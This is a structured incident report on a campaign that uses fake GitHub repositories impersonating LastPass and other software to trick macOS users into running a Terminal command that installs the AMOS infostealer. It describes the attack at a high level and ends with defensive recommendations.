Full Report
LastPass is warning users of a campaign that targets macOS users with malicious software impersonating popular products delivered through fraudulent GitHub repositories. [...]
Analysis Summary
# Incident Report: Fake Password Managers Infect Mac Users with AMOS Stealer
## Executive Summary
A recent campaign targeted macOS users by distributing malware disguised as legitimate software, including the legitimate password manager LastPass, via fraudulent GitHub repositories. Attackers leveraged search engine optimization (SEO) to promote these repositories, leading victims to execute a "ClickFix" command that downloaded and installed the Atomic (AMOS) infostealer. The outcome is the potential compromise of user data by a sophisticated, persistent malware-as-a-service operation.
## Incident Details
- Discovery Date: Unknown prior to LastPass's public warning, September 22, 2025.
- Incident Date: Ongoing at the time of reporting.
- Affected Organization: LastPass (as the primary entity warning users) and numerous software vendors whose products were impersonated.
- Sector: Technology/Software Distribution (affecting end-users across various sectors).
- Geography: Global (targeting macOS users accessible via public search engines).
## Timeline of Events
### Initial Access
- Date/Time: Ongoing campaign prior to September 22, 2025.
- Vector: Deceptive search engine results (SEO) promoting phishing domains hosted on GitHub.
- Details: Attackers created numerous deceptive GitHub repositories impersonating over 100 software solutions (e.g., LastPass, 1Password, Dropbox, Notion). The repositories contained a prominent "download button" leading to a secondary site.
### Lateral Movement
- Details: Not explicitly detailed in the primary report, but the AMOS infostealer is designed to target and steal data on infected machines. Furthermore, a recently added backdoor component suggests an intent for **persistent access**.
### Data Exfiltration/Impact
- Details: The payload delivered was the **Atomic (AMOS) infostealer**, which collects data from infected machines. The malware is offered as a Malware-as-a-Service (MaaS) subscription.
### Detection & Response
- Detection: LastPass identified and began monitoring the campaign.
- Response actions taken: LastPass is actively reporting the fake repositories to GitHub for takedown, though new ones are rapidly created.
## Attack Methodology
- Initial Access: **Social Engineering/Phishing via SEO** leading to execution of malicious commands.
- Persistence: **Backdoor component** recently added to the AMOS malware (implied for persistent stealthy access).
- Privilege Escalation: Not explicitly detailed, but likely achieved through system commands executed by the user.
- Defense Evasion: Use of numerous, disposable GitHub accounts to host repositories to evade takedowns.
- Credential Access: Infostealer capability of AMOS framework.
- Discovery: Attackers relied on victims searching for legitimate software.
- Lateral Movement: Not specified beyond initial endpoint compromise.
- Collection: AMOS targets data on infected machines.
- Exfiltration: Implied as part of the AMOS MaaS capabilities.
- Impact: Installation of information-stealing malware.
## Impact Assessment
- Financial: Unknown direct costs, but the AMOS framework itself is a commercialized service ($1,000/month).
- Data Breach: Theft of sensitive data and credentials residing on compromised macOS systems.
- Operational: Potential operational disruption for individual users whose systems are compromised by the infostealer.
- Reputational: Negative impact on the brands whose software was impersonated, and on the security posture of affected users.
## Indicators of Compromise
*Note: Specific IoCs are not provided in the text; the primary indicator mechanism is identified behavior.*
- Network indicators: N/A (No specific URLs/IPs provided). Actions involved `curl` requests to download payloads.
- File indicators: **install.sh** (Payload download script, often located in the */tmp* directory).
- Behavioral indicators: User being tricked into pasting and running an unrecognized command into the macOS Terminal (ClickFix technique).
## Response Actions
- Containment: LastPass is working to contain reputational risk by warning users.
- Eradication: Implied need for user-level removal of the AMOS payload and any associated persistence mechanisms.
- Recovery: Users must revert lost credentials and secure their systems post-infection.
## Lessons Learned
- Reliance on search engine results and non-official download sources for software is highly dangerous.
- Attackers are successfully leveraging SEO to funnel victims into execution chains (ClickFix).
- The threat landscape evolves, with malware like AMOS adding persistence components (backdoors).
## Recommendations
- **User Education:** Cautiously scrutinize any command provided by a website, particularly those requiring execution in the Terminal, before running them.
- **Source Verification:** Only download software from the verified, official vendor websites. If a macOS version is not available there, assume third-party variants are likely malicious.
- **Monitoring:** Security teams should monitor for high-ranking, deceptive search results related to internal tools or frequently used software.